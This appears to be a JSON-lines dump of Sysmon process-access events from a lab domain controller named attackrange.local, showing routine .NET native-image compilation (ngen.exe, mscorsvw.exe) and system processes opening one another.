{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.087\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001017310A00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.087","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001017310A00}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.087\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001017310A00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.087","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001017310A00}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.087\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001017310A00}\r\nTargetProcessId: 4540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.087","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001017310A00}","TargetProcessId":"4540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.134\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.134","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.134\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.134","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.165\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001084370A00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.165","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001084370A00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:51.165\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E7-5F25-0000-001084370A00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:51.165","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E7-5F25-0000-001084370A00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
